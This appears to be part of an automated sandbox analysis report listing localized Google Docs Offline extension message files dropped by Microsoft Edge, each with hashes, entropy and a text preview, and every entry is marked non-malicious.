                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):838
                                                                                                                                                                                                                                                        Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                        MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                        SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                        SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                        SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1305
                                                                                                                                                                                                                                                        Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                        MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                        SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                        SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                        SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):911
                                                                                                                                                                                                                                                        Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                        MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                        SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                        SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                        SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):939
                                                                                                                                                                                                                                                        Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                        MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                        SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                        SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                        SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):977
                                                                                                                                                                                                                                                        Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                        MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                        SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                        SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                        SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):972
                                                                                                                                                                                                                                                        Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                        MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                        SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                        SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                        SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):990
                                                                                                                                                                                                                                                        Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                        MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                        SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                        SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                        SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1658
                                                                                                                                                                                                                                                        Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                        MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                        SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                        SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                        SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1672
                                                                                                                                                                                                                                                        Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                        MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                        SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                        SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                        SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):935
                                                                                                                                                                                                                                                        Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                        MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                        SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                        SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                        SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1065
                                                                                                                                                                                                                                                        Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                        MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                        SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                        SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                        SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2771
                                                                                                                                                                                                                                                        Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                        MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                        SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                        SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                        SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):858
                                                                                                                                                                                                                                                        Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                        MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                        SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                        SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                        SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):954
                                                                                                                                                                                                                                                        Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                        MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                        SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                        SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                        SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):899
                                                                                                                                                                                                                                                        Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                        MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                        SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                        SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                        SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
